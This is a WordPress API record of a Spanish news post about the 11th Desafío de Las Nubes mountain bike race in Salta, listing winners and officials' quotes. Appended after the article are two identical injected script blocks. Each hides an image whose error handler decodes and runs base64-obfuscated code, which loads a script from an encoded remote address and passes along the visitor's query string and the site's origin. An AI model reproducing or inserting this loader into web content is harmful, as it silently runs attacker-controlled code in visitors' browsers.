{"id":5249,"date":"2025-06-11T10:22:03","date_gmt":"2025-06-11T13:22:03","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5249"},"modified":"2025-08-13T23:30:15","modified_gmt":"2025-08-14T02:30:15","slug":"desafio-de-las-nubes-salta-celebro-su-gran-fiesta-del-mountain-bike-con-saltenos-en-el-podio","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5249","title":{"rendered":"Desaf\u00edo de Las Nubes: Salta Celebr\u00f3 su Gran Fiesta del Mountain Bike con salte\u00f1os en el podio"},"content":{"rendered":"\n<p><strong><em>Con m\u00e1s de 1.500 ciclistas y una gran presencia salte\u00f1a en el podio, la 11\u00aa edici\u00f3n del Desaf\u00edo de Las Nubes se consolid\u00f3 como la fiesta del mountain bike en la provincia, destac\u00e1ndose como un evento deportivo de alcance nacional e internacional.<\/em><\/strong><\/p>\n\n\n\n<p>Salta vibr\u00f3 con la 11\u00aa edici\u00f3n del Desaf\u00edo de Las Nubes, que una vez m\u00e1s se consolid\u00f3 como la carrera m\u00e1s convocante de la provincia, reuniendo a m\u00e1s de 1.500 ciclistas nacionales e internacionales. Adem\u00e1s, hubo podios &nbsp;de salte\u00f1os como;&nbsp;<strong>Nicol\u00e1s Reynoso<\/strong>; &nbsp;<strong>Franco Delgado<\/strong>;&nbsp;<strong>Claudia Maldonado<\/strong>&nbsp;y&nbsp;<strong>Delfina \u00c1lvarez<\/strong>.<\/p>\n\n\n\n<p>El evento no solo super\u00f3 las expectativas en participaci\u00f3n, sino que tambi\u00e9n demostr\u00f3 el fuerte compromiso del Gobierno de Salta con el deporte. El festejo salte\u00f1o lleg\u00f3 con la victoria de Claudia Maldonado, quien se qued\u00f3 con la general del rural bike de 80 kil\u00f3metros para las damas. La biker local emple\u00f3 3 horas y 21 minutos, imponi\u00e9ndose a la reconocida marplatense Carolina P\u00e9rez y a la salte\u00f1a Delfina \u00c1lvarez. El tucumano Luciano Gay se impuso en la prueba de 50 kil\u00f3metros de XC con un tiempo de 2 horas y 15 minutos, seguido por los salte\u00f1os Nicol\u00e1s Reynoso y Franco Delgado.<\/p>\n\n\n\n<p>\u00abDesde el Gobierno de la Provincia de Salta creemos que el deporte transforma y abre caminos\u00bb, expres\u00f3 la Ministra de Turismo y Deportes,&nbsp;<strong>Manuela Arancibia<\/strong>, destacando la importancia de este tipo de eventos para la comunidad y el desarrollo provincial.<\/p>\n\n\n\n<p>El secretario de Deportes,<strong>&nbsp;Ignacio Garc\u00eda Be<\/strong>s, indic\u00f3 \u00bb En un marco extraordinario de tres jornadas; la competencia reuni\u00f3 a deportistas de todas las edades y niveles; participaron, ni\u00f1os, j\u00f3venes y adultos mayores\u201d.<\/p>\n\n\n\n<p><strong>Ramiro Cornejo<\/strong>, organizador &nbsp;del evento, remarc\u00f3 \u201cTodos los que largaron est\u00e1n de vuelta y esa es la principal satisfacci\u00f3n. Disfrutamos de d\u00edas privilegiados y hubo mucha gente que se acerc\u00f3 a disfrutar de esta fiesta del MTB. Nos llena de orgullo que se hicieron presentes de todas las provincias de Argentina y de otros pa\u00edses como Bolivia, Paraguay y Chile\u201d.<\/p>\n\n\n\n<p>Los pelotones partieron desde el Parque del Bicentenario para recorrer diversas distancias: 80 kil\u00f3metros de rural bike, 50 y 35 kil\u00f3metros de la modalidad XC, y 30 kil\u00f3metros de rural para los menos expertos. Tambi\u00e9n, hubo una Expo en el Parque del Bicentenario donde fue el punto de encuentro de empresas y corredores, quienes apostaron por una carrera con 11 a\u00f1os de crecimiento sostenido. Asimismo, previo a la jornada principal, 180 peque\u00f1os bikers protagonizaron la carrera infantil, en el Parque.<\/p>\n\n\n\n<p>El Desaf\u00edo de Las Nubes no solo es una competencia, sino una verdadera celebraci\u00f3n del ciclismo que posiciona a Salta como un referente en el calendario deportivo nacional e internacional.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17832-desafio-de-las-nubes-salta-celebro-su-gran-fiesta-del-mountain-bike-con-saltenios-en-el-podio.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17832-desafio-de-las-nubes-salta-celebro-su-gran-fiesta-del-mountain-bike-con-saltenios-en-el-podio.webp\" alt=\"Desaf\u00edo de Las Nubes: Salta Celebr\u00f3 su Gran Fiesta del Mountain Bike con salte\u00f1os en el podio\"\/><\/a><\/figure>\n\n\n\n<p><strong>Triunfos para el NOA y Destacadas Actuaciones Salte\u00f1as<\/strong><\/p>\n\n\n\n<p>Las generales del Desaf\u00edo se quedaron en el NOA, con actuaciones sobresalientes:<\/p>\n\n\n\n<p>El tucumano Luciano Gay (BH) se impuso en la prueba de 50 kil\u00f3metros de XC con un tiempo de 2 horas y 15 minutos, seguido por los salte\u00f1os Nicol\u00e1s Reynoso y Franco Delgado.<\/p>\n\n\n\n<p>En los 80 kil\u00f3metros de rural bike, el catamarque\u00f1o Leonardo Calvimonte, debutante en el Desaf\u00edo, se llev\u00f3 la victoria tras 2 horas y 51 minutos, superando a David Rojas y Jos\u00e9 Vera.<\/p>\n\n\n\n<p>El XC femenino fue dominado por la juje\u00f1a Agustina Apaza, quien con 2 horas y 47 minutos volvi\u00f3 a ser la mejor del Desaf\u00edo de Las Nubes, por delante de la tucumana Leila Luque y la salte\u00f1a Florencia \u00c1vila.<\/p>\n\n\n\n<p>Claudia Maldonado se qued\u00f3 con la general del rural bike de 80 kil\u00f3metros para las damas.&nbsp;&nbsp;La biker local emple\u00f3 3 horas y 21 minutos, imponi\u00e9ndose a la reconocida marplatense Carolina P\u00e9rez y a la salte\u00f1a Delfina \u00c1lvarez.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con m\u00e1s de 1.500 ciclistas y una gran presencia salte\u00f1a en el podio, la 11\u00aa edici\u00f3n del Desaf\u00edo de Las Nubes se consolid\u00f3 como la fiesta del mountain bike en la provincia, destac\u00e1ndose como un evento deportivo de alcance nacional e internacional. Salta vibr\u00f3 con la 11\u00aa edici\u00f3n del Desaf\u00edo de Las Nubes, que una [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5250,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18,17],"tags":[],"class_list":{"0":"post-5249","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5249"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5249"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5249\/revisions"}],"predecessor-version":[{"id":6464,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5249\/revisions\/6464"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5250"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5249"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5249"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5249"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}